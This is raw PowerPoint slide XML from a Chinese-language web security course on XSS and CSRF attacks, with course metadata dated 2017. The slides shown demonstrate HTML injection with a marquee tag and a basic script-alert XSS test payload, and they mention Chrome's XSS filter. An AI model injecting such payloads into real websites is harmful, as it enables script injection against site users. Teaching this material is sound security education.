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306" r:id="rId2"/>
    <p:sldId id="262" r:id="rId3"/>
    <p:sldId id="307" r:id="rId4"/>
    <p:sldId id="309" r:id="rId5"/>
    <p:sldId id="264" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="266" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="269" r:id="rId11"/>
    <p:sldId id="270" r:id="rId12"/>
    <p:sldId id="310" r:id="rId13"/>
    <p:sldId id="311" r:id="rId14"/>
    <p:sldId id="312" r:id="rId15"/>
    <p:sldId id="313" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="314" r:id="rId18"/>
    <p:sldId id="274" r:id="rId19"/>
    <p:sldId id="275" r:id="rId20"/>
    <p:sldId id="315" r:id="rId21"/>
    <p:sldId id="276" r:id="rId22"/>
    <p:sldId id="260" r:id="rId23"/>
    <p:sldId id="284" r:id="rId24"/>
    <p:sldId id="286" r:id="rId25"/>
    <p:sldId id="287" r:id="rId26"/>
    <p:sldId id="288" r:id="rId27"/>
    <p:sldId id="291" r:id="rId28"/>
    <p:sldId id="289" r:id="rId29"/>
    <p:sldId id="301" r:id="rId30"/>
    <p:sldId id="302" r:id="rId31"/>
    <p:sldId id="258" r:id="rId32"/>
    <p:sldId id="259" r:id="rId33"/>
    <p:sldId id="279" r:id="rId34"/>
    <p:sldId id="281" r:id="rId35"/>
    <p:sldId id="282" r:id="rId36"/>
    <p:sldId id="263" r:id="rId37"/>
    <p:sldId id="308" r:id="rId38"/>
    <p:sldId id="296" r:id="rId39"/>
    <p:sldId id="297" r:id="rId40"/>
    <p:sldId id="298" r:id="rId41"/>
    <p:sldId id="299" r:id="rId42"/>
    <p:sldId id="300" r:id="rId43"/>
    <p:sldId id="303" r:id="rId44"/>
    <p:sldId id="304" r:id="rId45"/>
    <p:sldId id="305" r:id="rId46"/>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544" autoAdjust="0"/>
    <p:restoredTop sz="94424" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="1590" y="96"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr varScale="1">
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="-606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2CAD3B-2C23-41E6-930E-93D6C2C88643}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2017/10/13</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B69AD-C4B9-4BFD-9A6A-3D006F3496FF}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="441768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53B69AD-C4B9-4BFD-9A6A-3D006F3496FF}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101892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D53B69AD-C4B9-4BFD-9A6A-3D006F3496FF}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3675069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3132839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377191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1074303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2432184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Date Placeholder 3"/>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33991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2076702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17070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18073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97376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2889111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Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9316CD0-3672-4FA6-A80F-E089AD446B7C}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2017/10/13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423419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316CD0-3672-4FA6-A80F-E089AD446B7C}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2017/10/13</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E6C93-C82A-4E11-BD62-707C32BCD852}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372744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0" y="2281881"/>
            <a:ext cx="9144000" cy="2001688"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Web Hacking and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Exploitation_2_2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="900" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="900" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>XSS and CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>實務測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="900" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="900" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>XSS==Cross Site Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>CSRF==Cross-site request forgery</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="427419"/>
            <a:ext cx="9144000" cy="694944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5807216" y="4694172"/>
            <a:ext cx="2999492" cy="1786283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627532" y="4512961"/>
            <a:ext cx="1234633" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>講師</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611057" y="5128604"/>
            <a:ext cx="1234633" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>助教</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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344334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內容版面配置區 9"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="725452" y="1821894"/>
            <a:ext cx="7710158" cy="3063143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>語法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;marquee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>人生走馬燈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;/marquee&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="橢圓 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4827373" y="4143633"/>
            <a:ext cx="1037968" cy="403654"/>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圖說文字 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132172" y="4804933"/>
            <a:ext cx="2084174" cy="366583"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44579"/>
              <a:gd name="adj2" fmla="val -10767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會動的   跑馬燈</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6755927" y="5787509"/>
            <a:ext cx="721672" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1102306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rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="31802" t="16196" r="31892" b="47879"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="648970" y="2134190"/>
            <a:ext cx="7002162" cy="3753023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="標題 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="1307154"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="5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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Javascript</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sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>語法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </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rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;SCRIPT&gt;alert(“happy hacking”)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2391272" y="2134190"/>
            <a:ext cx="6269473" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Google Chrome </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>瀏覽器有保護機制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Google Chrome XSS audit filter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996778" y="5074508"/>
            <a:ext cx="2141838" cy="3295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右箭號 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68631" y="4648200"/>
            <a:ext cx="928147" cy="118212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t>保護機制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="圖片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4303304" y="4508977"/>
            <a:ext cx="4727141" cy="2262525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053212" y="5458779"/>
            <a:ext cx="2875915" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Google Chrome </a:t>
            </a:r>
          </a:p>
          <a:p>
